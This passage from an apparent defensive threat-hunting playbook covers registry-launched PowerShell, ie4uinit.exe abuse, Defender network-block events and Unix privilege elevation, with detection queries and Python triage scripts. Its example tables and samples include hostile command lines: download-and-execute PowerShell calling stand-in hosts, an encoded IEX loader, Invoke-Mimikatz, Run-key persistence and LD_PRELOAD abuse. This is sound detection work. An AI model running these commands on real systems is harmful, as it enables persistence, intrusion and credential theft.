Part 7
🚨 PowerShell Invocation from Registry
🔍 1. Attack Breakdown
📝 What is PowerShell Invocation from Registry?
PowerShell Invocation from Registry is a technique where malicious payloads or commands are stored in Windows Registry keys and then executed using PowerShell.
Attackers use this technique for:
Persistence: Execute malicious commands on system startup or user login.
Defense Evasion: Hide commands in registry keys instead of traditional scripts.
Stealth: Avoid dropping visible files on disk.
📑 Why Do Attackers Use the Registry for PowerShell Invocation?
Stealth: Registry-based execution is less visible than file-based attacks.
Persistence: Payloads can be triggered at startup or specific events.
Evasion: Commands stored in registry are harder for traditional antivirus to detect.
Flexibility: Can execute any arbitrary PowerShell code.
📌 Common Attack Scenarios
Technique | Registry Path | Example Payload
Startup Persistence | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | powershell.exe -c "Invoke-WebRequest -Uri http://malicious.com/payload.ps1"
Scheduled Task Registry Key | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks | powershell.exe -EncodedCommand <base64>
AutoRun Key Abuse | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run | powershell.exe -Command Start-Process notepad.exe
Obfuscated Payload in Registry | HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System | powershell.exe -c "IEX (Get-Content 'reg_path')"
Shell Handlers | HKCU\Software\Classes\mscfile\shell\open\command | powershell.exe -c Invoke-Mimikatz
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Search Common Startup Keys for PowerShell Commands
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' | Select-Object *
Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run' | Select-Object *
🕵️ Search Registry for PowerShell Commands Globally
reg query HKCU /s /f "powershell"
reg query HKLM /s /f "powershell"
🕵️ Inspect Scheduled Tasks in Registry
Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks' |
ForEach-Object { Get-ItemProperty -Path $_.PsPath }
🕵️ Look for Base64-Encoded PowerShell Commands
reg query HKCU /s /f "powershell.exe -EncodedCommand"
🕵️ Monitor Registry Key Changes
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=12} |
Where-Object { $_.Message -like "*powershell*" }
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect PowerShell Invocation via Registry Keys
DeviceRegistryEvents
| where RegistryKey contains "CurrentVersion\\Run" or RegistryKey contains "TaskCache"
| where RegistryValueData contains "powershell.exe"
| project Timestamp, DeviceName, RegistryKey, RegistryValueName, RegistryValueData, AccountName
🕵️ Identify Base64-Encoded PowerShell Commands in Registry
DeviceRegistryEvents
| where RegistryValueData contains "-EncodedCommand"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName
🕵️ Trace PowerShell Executions Triggered from Registry Keys
DeviceProcessEvents
| where ProcessCommandLine contains "powershell.exe"
| where InitiatingProcessFileName == "reg.exe"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
🕵️ Detect Suspicious Registry Paths Executing PowerShell
DeviceRegistryEvents
| where RegistryKey contains "Run" or RegistryKey contains "TaskCache"
| where RegistryValueData contains "IEX"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName
📊 Event Viewer Logs
Event ID | Description
4688 | A new process was created (powershell.exe).
4663 | Object access attempt detected on a registry key.
4104 | PowerShell script block logging (useful for obfuscated payloads).
12 (Sysmon) | Registry key or value was created.
13 (Sysmon) | Registry key or value was modified.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: powershell.exe -c "IEX (Get-ItemProperty 'HKCU:\\malicious_key')"
📌 Focus on Event ID 4663:
Registry access attempts:
RegistryKey: HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
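As an added example (not part of the original playbook), the following Python script applies the checks above to autorun values that have already been collected, for instance the output of the Get-ItemProperty commands or the RegistryValueData column of the KQL results. It decodes -EncodedCommand payloads (UTF-16LE base64, which a plain text search for "-EncodedCommand" cannot see through, and which is usually shortened to -enc or -e) and then flags the indicators the page names (IEX, Invoke-WebRequest, Get-ItemProperty, Get-Content) together with the hidden-window and no-profile switches registry-staged loaders tend to add. The registry values, value names and the URL are constructed sample data; the indicator list and the regular expressions are my own and should be tuned to your environment.

```python
import base64
import binascii
import re

# Constructed sample Run-key values (hypothetical; not collected from a real host).
# Each tuple is (key path, value name, value data), the shape Get-ItemProperty returns.
_ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
    .encode("utf-16-le")).decode("ascii")

SAMPLE_RUN_VALUES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     "powershell.exe -w hidden -nop -EncodedCommand " + _ENCODED_SAMPLE),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\system32\SecurityHealthSystray.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Loader",
     r'''powershell.exe -c "IEX (Get-ItemProperty 'HKCU:\Software\Classes\stage').payload"'''),
]

POWERSHELL_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; -e, -ec and -enc are the
# usual short forms. The following token must look like base64 (at least 8 characters).
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})",
                        re.IGNORECASE)
# Indicators drawn from the page's own examples plus the switches loaders typically add.
INDICATORS = {
    "iex": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b",
                           re.IGNORECASE),
    "registry_read": re.compile(r"Get-ItemProperty(?:Value)?|Get-Content", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.IGNORECASE),
    "base64_inline": re.compile(r"FromBase64String", re.IGNORECASE),
}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_value(key, name, data):
    """Classify one autorun value. Non-PowerShell entries come back with suspicious=False."""
    finding = {"key": key, "name": name, "data": data, "powershell": False,
               "decoded": None, "indicators": [], "suspicious": False}
    if not POWERSHELL_RE.search(data):
        return finding
    finding["powershell"] = True
    decoded = decode_encoded_command(data)
    finding["decoded"] = decoded
    # Match indicators against the decoded script rather than the base64 blob, so the
    # blob's letters cannot produce accidental hits.
    effective = data
    if decoded is not None:
        effective = ENCODED_RE.sub("-EncodedCommand", data) + "\n" + decoded
    finding["indicators"] = [k for k, rx in INDICATORS.items() if rx.search(effective)]
    if decoded is not None:
        finding["indicators"].insert(0, "encoded_command")
    finding["suspicious"] = bool(finding["indicators"])
    return finding


def scan_run_values(values):
    """Return only the autorun values that warrant analyst review."""
    return [f for f in (analyze_value(*v) for v in values) if f["suspicious"]]


if __name__ == "__main__":
    for f in scan_run_values(SAMPLE_RUN_VALUES):
        print(f"{f['key']}\\{f['name']}: {f['indicators']}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Feed it the real Run-key values by exporting Get-ItemProperty output to CSV or JSON and building the same (key, name, data) tuples; the decoded text is what you hand to the script block (4104) analyst, since the encoded form never shows the IEX or download call in 4688.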
🕵️ 3. Investigation Techniques
1️⃣ Inspect Specific Registry Keys
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
2️⃣ Trace PowerShell Commands via Sysmon Logs
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=12}
3️⃣ Analyze Process Tree
Trace parent-child relationships:
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }
🔧 4. Remediation Steps
📌 1. Remove Malicious Registry Keys
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'SuspiciousKey'
📌 2. Disable Registry Editing for Non-Admin Users
Apply Group Policy to prevent unauthorized changes.
📌 3. Monitor Registry Changes Continuously
Enable Registry auditing and monitor changes.
📌 4. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan
🛡️ 5. Prevention Steps
Enable Registry Auditing:
Monitor HKCU:\Run and HKLM:\Run keys.
Block Obfuscated PowerShell Commands:
Use Windows Defender Exploit Guard (ASR Rules).
Restrict Registry Access:
Limit modification permissions for sensitive keys.
Enable Command Line Logging:
Track PowerShell invocation via Event ID 4688.
Educate Users:
Avoid executing unknown scripts or registry changes.
🧠 6. Key Takeaways
Focus on Registry Keys: Run, TaskCache, Explorer\StartupApproved.
Monitor Event IDs: 4688, 4663, 12 (Sysmon), 13 (Sysmon).
Look for Obfuscated Payloads: -EncodedCommand, IEX.
🚨 Unusual ie4uinit Process Path
🔍 1. Attack Breakdown
📝 What is ie4uinit.exe?
ie4uinit.exe is a legitimate Windows system file located in:
C:\Windows\System32\ie4uinit.exe
C:\Windows\SysWOW64\ie4uinit.exe
It is used for Internet Explorer user profile initialization and to handle user-specific configurations for the browser.
📑 Why Do Attackers Abuse ie4uinit.exe?
Trusted Binary: It is signed by Microsoft, making it less suspicious.
Execution Proxy: Can be used to execute malicious payloads indirectly.
Persistence: Often abused in startup tasks or registry keys for persistence.
Evasion: May bypass traditional antivirus and security solutions.
📌 Common Attack Scenarios
Technique | Description | Example Command
Process Path Spoofing | Run ie4uinit.exe from an unusual location. | C:\Temp\ie4uinit.exe
Execution Proxy | Use ie4uinit.exe to execute a malicious DLL. | C:\Windows\Temp\ie4uinit.exe payload.dll
Startup Persistence | Create a startup entry invoking ie4uinit.exe. | reg add HKCU\...\Run /v ie4uinit /t REG_SZ /d "C:\Temp\ie4uinit.exe"
Fileless Execution | Use ie4uinit.exe for in-memory execution. | C:\Windows\System32\ie4uinit.exe /k powershell -c <payload>
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List All ie4uinit.exe Processes
Get-Process -Name ie4uinit | Select-Object Id, Path, StartTime
🕵️ Validate ie4uinit.exe Paths
Get-Command ie4uinit.exe | Select-Object Name, Source
🕵️ Check ie4uinit.exe in Unusual Directories
Get-ChildItem -Path "C:\Windows\Temp", "C:\Users\Public", "C:\ProgramData" -Filter "ie4uinit.exe" -Recurse -ErrorAction SilentlyContinue
🕵️ Inspect ie4uinit.exe Registry Keys
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' |
ForEach-Object { $_.PSObject.Properties } |
Where-Object { $_.Value -match "ie4uinit" } |
Select-Object Name, Value
🕵️ Trace Parent-Child Relationships
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "ie4uinit.exe" } |
Select-Object ProcessId, ParentProcessId, CommandLine
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect ie4uinit.exe Executed from Suspicious Paths
DeviceProcessEvents
| where FileName == "ie4uinit.exe"
| where FolderPath !startswith "C:\\Windows\\System32" and FolderPath !startswith "C:\\Windows\\SysWOW64"
| project Timestamp, DeviceName, FolderPath, ProcessCommandLine, ParentProcessName, AccountName
🕵️ Identify Suspicious Parent Processes for ie4uinit.exe
DeviceProcessEvents
| where FileName == "ie4uinit.exe"
| where ParentProcessFileName !in ("explorer.exe", "cmd.exe")
| project Timestamp, DeviceName, ParentProcessFileName, ProcessCommandLine, AccountName
🕵️ Trace Registry-Based Persistence with ie4uinit.exe
DeviceRegistryEvents
| where RegistryKey contains "CurrentVersion\\Run"
| where RegistryValueData contains "ie4uinit.exe"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName
🕵️ Monitor File Creation of ie4uinit.exe in Suspicious Directories
DeviceFileEvents
| where FileName == "ie4uinit.exe"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FolderPath, FileName, AccountName
📊 Event Viewer Logs
Event ID | Description
4688 | A new process was created (ie4uinit.exe).
4663 | Object access attempt (e.g., file access).
4104 | PowerShell script block execution.
7045 | A new service was installed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: C:\Users\Public\ie4uinit.exe
ParentProcessName: cmd.exe
📌 Focus on Event ID 4663:
Registry access:
RegistryKey: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
🕵️ 3. Investigation Techniques
1️⃣ Trace Unusual Process Paths
Get-Process -Name "ie4uinit" | Select-Object Path
2️⃣ Analyze Parent Process
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }
3️⃣ Check Registry for Persistence
reg query HKCU /s /f "ie4uinit.exe"
reg query HKLM /s /f "ie4uinit.exe"
🔧 4. Remediation Steps
📌 1. Terminate Malicious Process
Stop-Process -Name "ie4uinit" -Force
📌 2. Remove Malicious Files
Remove-Item -Path "C:\Users\Public\ie4uinit.exe" -Force
📌 3. Delete Malicious Registry Keys
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ie4uinit"
📌 4. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan
🛡️ 5. Prevention Steps
Monitor System32 and SysWOW64 Integrity:
Ensure ie4uinit.exe exists only in legitimate paths.
Enable Command Line Auditing:
Track process creation with ie4uinit.exe.
Restrict Write Access to Sensitive Directories:
Prevent unauthorized writes to C:\Windows, C:\Users\Public.
Registry Auditing:
Enable alerts for modifications to Run keys.
User Awareness:
Educate users on avoiding suspicious downloads or execution prompts.
🧠 6. Key Takeaways
Monitor Process Paths: Validate ie4uinit.exe paths regularly.
Event IDs to Watch: 4688, 4663, 7045.
Check Parent Processes: Look for unusual relationships.
🚨 Exploit Guard Network Protection Blocked Event:
🔍 1. Attack Breakdown
📝 What is Exploit Guard Network Protection?
Exploit Guard Network Protection is a feature in Microsoft Defender for Endpoint (MDE) and Windows Defender Exploit Guard (WDEG).
It prevents network-based attacks by blocking connections to malicious domains, IPs, or URLs.
The feature uses threat intelligence feeds and real-time analysis to detect and block malicious connections.
📑 Why is Network Protection Blocked?
The system detected a malicious network connection attempt from a process or service.
Common reasons include:
Accessing a known malicious domain.
Malware attempting Command and Control (C2) communication.
Phishing attempts via malicious URLs.
Data exfiltration via suspicious outbound traffic.
📌 Common Attack Scenarios
Scenario | Description | Example Indicator
Malware C2 Communication | Malware attempting to connect to a command server. | http://attacker.com/c2
Phishing Website | User accessed a phishing link via browser. | http://phishing-site.com
Data Exfiltration | Sensitive data sent to an external server. | http://malicious-upload.com
Malicious Script Execution | Script triggers outbound traffic to malicious IP. | powershell -c "Invoke-WebRequest http://malicious.com/payload"
Drive-by Download Attack | Website delivers malicious files during browsing. | http://exploit-landing.com
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Check Defender Network Protection Events in Event Viewer
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; Id=1125} | Select-Object TimeCreated, Message
🕵️ Inspect Blocked Network Connections
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; Id=1125} |
ForEach-Object { $_.Message }
🕵️ List Processes Triggering Network Protection Events
Get-Process | Where-Object { $_.Id -in (Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; Id=1125} | Select-Object -ExpandProperty ProcessId) }
🕵️ Inspect Recent Malicious Domains and URLs Blocked
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; Id=1125} |
Where-Object { $_.Message -match "Domain|IP|URL" }
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Exploit Guard Network Protection Blocked Events
DeviceEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, RemoteIP, RemoteUrl, ActionType
🕵️ Identify Processes Triggering Network Blocks
DeviceEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
🕵️ Trace Malicious URLs or IPs Triggering Network Protection
DeviceEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, AccountName
🕵️ Monitor Repeated Block Events from the Same Process
DeviceEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| summarize Count=count() by InitiatingProcessFileName, RemoteUrl, RemoteIP, DeviceName
| order by Count desc
🕵️ Correlate with Web Browsing Activity
DeviceEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| where InitiatingProcessFileName in~ ("msedge.exe", "chrome.exe", "firefox.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, AccountName
📊 Event Viewer Logs
Event ID
Description
1125
Windows Defender Exploit Guard Network Protection event.
5156
Network connection allowed (trace subsequent connections).
4688
Process creation (trace responsible process).
📌 Focus on Event ID 1125:
Look for:
Action: Blocked
RemoteIP: 45.67.89.123
RemoteUrl: http://malicious.com/payload
InitiatingProcess: powershell.exe
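As an added example (not part of the original playbook), this Python script performs the "repeated block events from the same process" roll-up offline over exported DeviceEvents rows and adds the triage step the queries above leave to the analyst: a block raised by a script host (PowerShell, wscript, mshta and the like) means code is already running on the host and is rated high, while a browser block usually means a user clicked a link. The rows, device names, accounts, hosts and addresses are constructed sample data (reserved documentation names and ranges); the SCRIPT_HOSTS set is my own list and should be extended for your estate.

```python
from collections import defaultdict
from urllib.parse import urlsplit


# Constructed DeviceEvents-style rows (hypothetical; field names follow the MDE schema used by
# the queries above, every value is made up, hosts use reserved documentation names/ranges).
def _event(ts, device, account, process, url, ip):
    return {"Timestamp": ts, "DeviceName": device, "AccountName": account,
            "InitiatingProcessFileName": process, "RemoteUrl": url, "RemoteIP": ip}


SAMPLE_EVENTS = [
    _event("2024-05-01T10:00:01Z", "ws01", "alice", "powershell.exe", "http://malicious.example/payload", "192.0.2.10"),
    _event("2024-05-01T10:05:01Z", "ws01", "alice", "powershell.exe", "http://malicious.example/payload", "192.0.2.10"),
    _event("2024-05-01T10:10:01Z", "ws01", "alice", "PowerShell.exe", "http://MALICIOUS.example/payload?x=1", "192.0.2.10"),
    _event("2024-05-01T11:20:44Z", "ws02", "bob", "msedge.exe", "http://phishing.example/login", "192.0.2.20"),
    _event("2024-05-01T12:00:00Z", "ws03", "carol", "powershell.exe", "", "198.51.100.5"),
    _event("2024-05-01T12:00:30Z", "ws03", "carol", "powershell.exe", "", "198.51.100.5"),
]

# Interpreters and LOLBins that have no business reaching a blocked destination (my list, extend it).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "cmd.exe"}


def destination(event):
    """Reduce RemoteUrl to a case-folded host name (path and query dropped); fall back to RemoteIP."""
    url = event.get("RemoteUrl") or ""
    host = urlsplit(url).hostname if "://" in url else url.split("/")[0]
    return (host or event.get("RemoteIP") or "unknown").lower()


def summarize_blocks(events):
    """Group like the 'summarize Count=count() by ...' query, most frequent pair first."""
    buckets = defaultdict(lambda: {"count": 0, "devices": set(), "accounts": set()})
    for e in events:
        b = buckets[(e["InitiatingProcessFileName"].lower(), destination(e))]
        b["count"] += 1
        b["devices"].add(e["DeviceName"])
        b["accounts"].add(e["AccountName"])
    rows = [{"process": p, "destination": d, **v} for (p, d), v in buckets.items()]
    return sorted(rows, key=lambda r: (-r["count"], r["process"], r["destination"]))


def repeat_offenders(events, threshold=3):
    """Pairs blocked at least `threshold` times: the beaconing pattern worth escalating first."""
    return [r for r in summarize_blocks(events) if r["count"] >= threshold]


def triage(events):
    """Attach a severity: script hosts are high, anything else (typically a browser) medium."""
    rows = summarize_blocks(events)
    for r in rows:
        r["severity"] = "high" if r["process"] in SCRIPT_HOSTS else "medium"
    return rows


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"{r['severity']:6} {r['count']:>3}  {r['process']:<16} {r['destination']}  "
              f"devices={sorted(r['devices'])}")
```

Case-folding the process name and normalising the URL to its host matter in practice: the same beacon will otherwise split across several rows (PowerShell.exe vs powershell.exe, a changing query string) and slip under a count threshold.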
🕵️ 3. Investigation Techniques
1️⃣ Trace Process Responsible for Blocked Activity
Get-Process -Id <ProcessId>
2️⃣ Inspect Command Line Arguments
Review the command used:
Get-CimInstance Win32_Process | Where-Object { $_.ProcessId -eq <PID> }
3️⃣ Analyze Remote URLs and IPs
Verify reputation of the URLs and IPs on:
🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
Stop-Process -Id <ProcessId> -Force
📌 2. Block Malicious IPs or Domains
New-NetFirewallRule -DisplayName "Block Malicious IP" -Direction Outbound -RemoteAddress <IP> -Action Block
📌 3. Remove Malicious Scheduled Tasks or Startup Entries
Get-ScheduledTask | Where-Object { $_.TaskPath -like "*malicious*" } | Unregister-ScheduledTask -Confirm:$false
📌 4. Review User Activity
Check logs for any unusual behavior tied to the user.
📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan
🛡️ 5. Prevention Steps
Enable Exploit Guard Network Protection:
Ensure it's set to Block Mode in policy.
Regularly Audit Policies:
Verify that malicious sites and IPs are actively blocked.
Monitor High-Risk Users:
Flag repeat offenders for suspicious activity.
Update Security Tools Regularly:
Ensure definitions and threat intelligence feeds are up-to-date.
Educate Users:
Warn against clicking on suspicious links or downloading unknown files.
🧠 6. Key Takeaways
Focus on Event IDs: 1125, 4688, 5156.
Trace Processes Triggering Blocks: Look for repeat offenders.
Correlate with Network Activity: Validate blocked domains and IPs.
Investigate URLs on Threat Intelligence Platforms: Verify malicious indicators.
🚨 Privilege Elevation (Linux & macOS):
🔍 1. Attack Breakdown
📝 What is Privilege Elevation?
Privilege Elevation occurs when an attacker gains higher privileges (e.g., root or admin access) on a system through vulnerabilities, misconfigurations, or design flaws.
This is often used for:
Full System Control: Gain unrestricted access to files and processes.
Persistence: Maintain access across system reboots.
Lateral Movement: Access other systems using elevated privileges.
Data Exfiltration: Bypass access controls.
📑 Why Attackers Seek Privilege Elevation?
Expand Control: Access sensitive files and services.
Bypass Security Controls: Disable security mechanisms.
Establish Persistence: Create backdoors or scheduled tasks.
Credential Dumping: Extract credentials for further compromise.
Cover Tracks: Modify logs and hide malicious activity.
📌 Common Privilege Elevation Techniques
Technique | Linux Example | macOS Example
Sudo Misconfigurations | sudo -l → sudo bash | sudo -l → sudo nano /etc/sudoers
Kernel Exploits | CVE-2021-4034 (Polkit) | CVE-2019-8526
Setuid Binaries | find / -perm -4000 | find / -perm +4000
Weak File Permissions | chmod 777 /etc/shadow | chmod 777 /etc/passwd
Exploiting Services | systemctl edit service | launchctl load -w /Library/LaunchDaemons
Environment Variable Abuse | LD_PRELOAD | DYLD_INSERT_LIBRARIES
Credential Dumping | /etc/shadow | security find-generic-password
🛡️ 2. Detection Techniques
📊 Linux Detection Techniques
🕵️ Check for Sudo Misconfigurations
sudo -l
🕵️ Identify Setuid Binaries
find / -perm -4000 2>/dev/null
🕵️ Check for Writable System Binaries
find /bin /sbin -perm -2 -type f
🕵️ Monitor Sudo Logins
Check /var/log/auth.log or /var/log/secure:
grep 'sudo:' /var/log/auth.log
🕵️ Identify Suspicious Kernel Modules
lsmod
dmesg | grep "exploit"
🕵️ Look for Suspicious Cron Jobs
crontab -l
ls -al /etc/cron*
📊 macOS Detection Techniques
🕵️ Check for Sudo Misconfigurations
sudo -l
🕵️ List Setuid and Setgid Binaries
find / -perm -4000 -o -perm -2000 -type f 2>/dev/null
🕵️ Inspect Launch Daemons and Agents
ls /Library/LaunchDaemons
ls ~/Library/LaunchAgents
🕵️ Check for Cron Jobs
crontab -l
ls -al /etc/cron*
🕵️ Identify Writable Configuration Files
find /System/Library -perm -2 -type f
🕵️ Look for Suspicious Kernel Extensions (kext)
kextstat | grep -v com.apple
📊 SIEM Detection Queries
📊 Linux SIEM Query (ELK, Splunk)
🕵️ Detect Sudo Privilege Escalation
index=linux source=/var/log/auth.log
| search "sudo:root"
| stats count by user, command
🕵️ Monitor Exploitation Attempts
index=linux (source=/var/log/messages OR source=/var/log/syslog)
| search "exploit"
| stats count by host, message
🕵️ Identify Abnormal Cron Job Modifications
index=linux source=/etc/cron*
| stats count by user, command
🕵️ Track Writable Binary Directories
index=linux
| search "chmod 777"
| stats count by user, path
📊 macOS SIEM Query (Splunk, ELK)
🕵️ Detect LaunchDaemon Manipulation
index=macos source=/var/log/system.log
| search "launchctl load"
| stats count by user, command
🕵️ Monitor Sudo Commands
index=macos source=/var/log/system.log
| search "sudo:"
| stats count by user, command
🕵️ Identify Suspicious Kernel Module Loading
index=macos source=/var/log/system.log
| search "kextstat"
| stats count by user, command
🕵️ Monitor DYLD_INSERT_LIBRARIES Abuse
index=macos source=/var/log/system.log
| search "DYLD_INSERT_LIBRARIES"
| stats count by user, command
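As an added example (not part of the original playbook), this Python script does what the grep and the "stats count by user, command" Splunk query above do, but offline and with the structure of the sudo log line parsed out: who ran what as which user, whether sudo refused (user not in sudoers, repeated bad passwords), and whether the command is an interactive root shell, touches one of the sensitive files from the table above, or carries an LD_PRELOAD / DYLD_INSERT_LIBRARIES assignment. The log excerpt is constructed sample data laid out the way sudo writes to syslog; ROOT_SHELLS and SENSITIVE_PATHS are my own lists.

```python
import re
from collections import Counter

# Constructed auth.log excerpt (hypothetical; the layout matches what sudo writes via syslog).
SAMPLE_AUTH_LOG = """\
May  1 10:15:02 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
May  1 10:16:40 web01 sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/bash
May  1 10:17:03 web01 sudo:      bob : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/bash
May  1 10:18:11 web01 sudo:    alice : 3 incorrect password attempts ; TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/vim /etc/sudoers
May  1 10:19:00 web01 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by bob(uid=1001)
May  1 10:22:45 web01 sudo:    carol : TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/env LD_PRELOAD=/tmp/x.so /usr/bin/id
""".splitlines()

# One sudo command record: "<user> : [<refusal reason> ;] TTY=.. ; PWD=.. ; USER=.. ; COMMAND=.."
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+[\d:]+)\s+(?P<host>\S+)\s+sudo(?:\[\d+\])?:\s+"
    r"(?P<user>\S+)\s+:\s+(?:(?P<reason>[^;]*?)\s+;\s+)?"
    r"TTY=(?P<tty>\S+)\s+;\s+PWD=(?P<pwd>\S+)\s+;\s+USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)
# Shells that give an interactive root prompt; extend for your distribution's layout.
ROOT_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/dash",
               "/usr/bin/bash", "/usr/bin/sh", "/usr/bin/zsh"}
# Files from the page whose edit via sudo deserves a look.
SENSITIVE_PATHS = ("/etc/sudoers", "/etc/shadow", "/etc/passwd", "/etc/cron")
PRELOAD_RE = re.compile(r"\b(?:LD_PRELOAD|DYLD_INSERT_LIBRARIES)=")


def classify(rec):
    """Tag one parsed sudo record with the reasons an analyst should look at it."""
    flags = []
    if rec["reason"]:
        flags.append("failed:" + rec["reason"])
    argv = rec["cmd"].split()
    if argv and argv[0] in ROOT_SHELLS and rec["runas"] == "root":
        flags.append("root_shell")
    if any(p in rec["cmd"] for p in SENSITIVE_PATHS):
        flags.append("sensitive_file")
    if PRELOAD_RE.search(rec["cmd"]):
        flags.append("env_preload")
    return flags


def parse_sudo_log(lines):
    """Parse command records only; pam_unix session lines and other noise are skipped."""
    records = []
    for line in lines:
        m = SUDO_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["reason"] = rec["reason"] or ""
        rec["flags"] = classify(rec)
        records.append(rec)
    return records


def stats_by_user_command(records):
    """The 'stats count by user, command' view: (user, command) -> count."""
    return Counter((r["user"], r["cmd"]) for r in records)


def alerts(records):
    return [r for r in records if r["flags"]]


if __name__ == "__main__":
    recs = parse_sudo_log(SAMPLE_AUTH_LOG)
    for (user, cmd), n in stats_by_user_command(recs).most_common():
        print(f"{n:>3}  {user:<8} {cmd}")
    for r in alerts(recs):
        print(f"ALERT {r['ts']} {r['host']} user={r['user']} runas={r['runas']} "
              f"flags={r['flags']} cmd={r['cmd']}")
```

On Red Hat-family hosts point it at /var/log/secure instead of /var/log/auth.log; the record layout is the same. A refused attempt followed by a successful root shell from the same user within minutes is the sequence to alert on, and both appear in the parsed output.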
🛡️ 3. Investigation Techniques
1️⃣ Trace Privilege Escalation Attempts
grep "sudo" /var/log/auth.log
grep "root" /var/log/secure
2️⃣ Analyze Exploit Attempts
dmesg | grep -i exploit
journalctl -k | grep -i exploit
3️⃣ Review New Cron Jobs
ls -al /etc/cron*
🔧 4. Remediation Steps
📌 1. Remove Malicious Cron Jobs
crontab -r
rm -f /etc/cron.d/malicious
📌 2. Revert Permissions
chmod 644 /etc/passwd
chmod 600 /etc/shadow
📌 3. Disable Suspicious LaunchAgents
